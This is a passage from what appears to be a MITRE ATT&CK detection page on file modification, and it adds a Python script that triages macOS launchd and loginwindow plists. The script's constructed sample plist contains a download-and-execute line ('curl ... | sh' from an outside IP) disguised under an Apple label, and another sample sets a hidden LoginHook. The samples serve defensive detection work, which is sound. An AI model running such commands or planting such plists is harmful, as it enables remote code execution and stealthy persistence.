Monitor for modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to %windir%\system32\inetsrv\config\applicationhost.config could indicate an IIS module installation.[39][40]

.005 Terminal Services DLL

Monitor unexpected changes and/or interactions with termsrv.dll, which is typically stored in %SystemRoot%\System32\.

Enterprise T1489 Service Stop

Monitor for changes made to files that may stop or disable services on a system to render those services unavailable to legitimate users.

ICS T0881 Service Stop

Monitor for changes made to files that may stop or disable services on a system to render those services unavailable to legitimate users.

Enterprise T1553 Subvert Trust Controls

Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries.[41] Also analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure "Hide Microsoft Entries" and "Hide Windows Entries" are both deselected.[41]

On macOS, the removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Also monitor software update frameworks that may strip this flag when performing updates.

.001 Gatekeeper Bypass

The removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Also monitor software update frameworks that may strip this flag when performing updates.

.003 SIP and Trust Provider Hijacking

Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries.[41] Also analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure "Hide Microsoft Entries" and "Hide Windows Entries" are both deselected.[41]

Enterprise T1569 System Services

Monitor for changes made to files that may abuse system services or daemons to execute commands or programs.

.001 Launchctl

Every Launch Agent and Launch Daemon must have a corresponding plist file on disk, which can be monitored. Plist files are located in the root, system, and per-user /Library/LaunchAgents or /Library/LaunchDaemons folders. A Launch Agent or Launch Daemon with an executable path pointing to /tmp or to shared folders such as /Users/Shared is potentially suspicious.
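The plist checks from this row, from Plist File Modification (path pointers that change between versions), from Hidden Users (Hide500Users) and from Login Hook (LoginHook in com.apple.loginwindow.plist) in one added example, not code from the ATT&CK page. plistlib reads both XML and binary plists, so the same code runs over /Library/LaunchDaemons, ~/Library/LaunchAgents and /Library/Preferences/com.apple.loginwindow.plist. The location and interpreter heuristics are assumptions and the sample plists are constructed.

```python
"""Triage macOS launchd and loginwindow property lists (added example)."""
import os
import plistlib

SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/", "/Library/Caches/")
INLINE_INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "osascript", "perl"}
APPLE_BINARY_DIRS = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")


def program_of(plist):
    """launchd runs Program if set, otherwise ProgramArguments[0]."""
    args = list(plist.get("ProgramArguments", []))
    if plist.get("Program"):
        return plist["Program"], args
    return (args[0] if args else ""), args


def triage_launchd(plist):
    findings = []
    prog, args = program_of(plist)
    if not prog:
        return [("no program", "Label=%s" % plist.get("Label"))]
    if prog.startswith(SUSPICIOUS_DIRS) or "/." in prog:
        findings.append(("program in suspicious or hidden path", prog))
    if os.path.basename(prog) in INLINE_INTERPRETERS and any(a in ("-c", "-e") for a in args[1:]):
        findings.append(("inline interpreter command", " ".join(args)))
    if plist.get("RunAtLoad") and (plist.get("KeepAlive") or plist.get("StartInterval")):
        findings.append(("persists and restarts itself", "RunAtLoad+KeepAlive/StartInterval"))
    if plist.get("Label", "").startswith("com.apple.") and not prog.startswith(APPLE_BINARY_DIRS):
        findings.append(("Apple-looking label for non-Apple binary", plist["Label"]))
    return findings


def triage_loginwindow(plist):
    findings = []
    if plist.get("LoginHook"):
        findings.append(("LoginHook set", plist["LoginHook"]))
    if plist.get("Hide500Users"):
        findings.append(("Hide500Users enabled: accounts with UID < 500 hidden from login window", "true"))
    return findings


def path_pointer_changes(old_plist, new_plist):
    """Program/path keys whose value differs between two versions of a launchd plist."""
    keys = ("Program", "ProgramArguments", "WorkingDirectory", "EnvironmentVariables")
    return {k: (old_plist.get(k), new_plist.get(k)) for k in keys if old_plist.get(k) != new_plist.get(k)}


def triage_plist_bytes(path, data):
    plist = plistlib.loads(data)              # XML or binary plist
    if os.path.basename(path) == "com.apple.loginwindow.plist":
        return triage_loginwindow(plist)
    return triage_launchd(plist)


# Constructed launch agent with an Apple-looking label that runs a download-and-execute shell
AGENT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdate.helper</string>
  <key>ProgramArguments</key><array><string>/bin/sh</string><string>-c</string>
    <string>curl -s http://203.0.113.7/p | sh</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""
# Constructed loginwindow preferences with both persistence/hiding keys set
LOGINWINDOW_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Hide500Users</key><true/>
  <key>LoginHook</key><string>/Users/Shared/.hook.sh</string>
</dict></plist>"""
OLD_DAEMON = {"Label": "com.example.agent", "ProgramArguments": ["/Library/Example/agent", "--daemon"], "RunAtLoad": True}
NEW_DAEMON = {"Label": "com.example.agent", "ProgramArguments": ["/Users/Shared/.a/agent", "--daemon"], "RunAtLoad": True}
```

Pair `path_pointer_changes` with the previous copy of a plist from your baseline on each File Modification event, and pass `open(path, "rb").read()` to `triage_plist_bytes` so binary plists are handled without a prior plutil conversion.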

Enterprise T1080 Taint Shared Content

Monitor for processes that write or overwrite many files in a network shared directory; such activity may be suspicious.

Enterprise T1600 Weaken Encryption

File Modification

.001 Reduce Key Space

There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as Modify System Image and Network Device CLI. Some detection methods require vendor support to aid in investigation.

.002 Disable Crypto Hardware

There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as Modify System Image and Network Device CLI. Some detection methods require vendor support to aid in investigation.

References

  1. Microsoft. (2018, May 31). File Management (Local File Systems). Retrieved September 28, 2021.
  2. Chrome Enterprise and Education Help. (n.d.). Use Chrome Browser with Roaming User Profiles. Retrieved March 28, 2023.
  3. Arntz, P. (2016, March 30). The Windows Vault. Retrieved November 23, 2020.
  4. ise. (2019, February 19). Password Managers: Under the Hood of Secrets Management. Retrieved January 22, 2021.
  5. Schroeder, W. & Christensen, L. (2021, June 22). Certified Pre-Owned - Abusing Active Directory Certificate Services. Retrieved August 2, 2022.
  6. Syynimaa, N. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved August 3, 2022.
  7. French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.
  8. French, D. & Filar, B. (2020, March 21). A Chain Is No Stronger Than Its Weakest LNK. Retrieved November 30, 2020.
  9. Apple. (n.d.). Open items automatically when you log in on Mac. Retrieved October 1, 2021.
  10. hoakley. (2021, September 16). How to run an app or tool at startup. Retrieved October 5, 2021.
  11. Wardle, P. (2018, July 23). Block Blocking Login Items. Retrieved October 1, 2021.
  12. Stokes, P. (2019, June 17). How Malware Persists on macOS. Retrieved September 10, 2019.
  13. Malware Archaeology. (2016, June). Windows PowerShell Logging Cheat Sheet - Win 7/Win 2008 or later. Retrieved June 24, 2016.
  14. Ross, C. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021.
  15. NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021.
  16. Harrell, C. (2012, December 11). Extracting ZeroAccess from NTFS Extended Attributes. Retrieved June 3, 2016.
  17. Cole, R., Moore, A., Stark, G. & Stancill, B. (2020, February 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September 17, 2020.
  18. Li, V. (2019, October 2). Polyglot Files: a Hacker's best friend. Retrieved September 27, 2022.
  19. Kessler, G. (2022, December 9). GCK's File Signatures Table. Retrieved August 23, 2022.
  20. Brennan, M. (2022, February 16). Hackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection. Retrieved August 22, 2022.
  21. Choi, S. (2015, August 6). Obfuscated API Functions in Modern Packers. Retrieved August 22, 2022.
  22. Jason (jxb5151). (2021, January 28). findapihash.py. Retrieved August 22, 2022.
  23. Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved December 20, 2017.
  24. Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelgänging. Retrieved December 20, 2017.
  25. hasherezade. (2017, December 18). Process Doppelgänging - a new way to impersonate a process. Retrieved December 20, 2017.
  26. hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021.
  27. Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.
  28. Wardle, P. (2019, September 17). Writing a File Monitor with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
  29. Serper, A. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.
  30. Marlin, J. (2013, March 24). Alternate Data Streams in NTFS. Retrieved March 21, 2018.
  31. Moe, O. (2018, January 14). Putting Data in Alternate Data Streams and How to Execute It. Retrieved June 30, 2018.
  32. Moe, O. (2018, April 11). Putting Data in Alternate Data Streams and How to Execute It - Part 2. Retrieved June 30, 2018.
  33. Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.
  34. Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.
  35. Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.
  36. Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
  37. Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.
  38. Rowland, C. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.
  39. Microsoft. (2007, November 24). IIS Modules Overview. Retrieved June 17, 2021.
  40. Hromcová, Z. & Cherepanov, A. (2021). Anatomy of Native IIS Malware. Retrieved September 9, 2021.
  41. Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.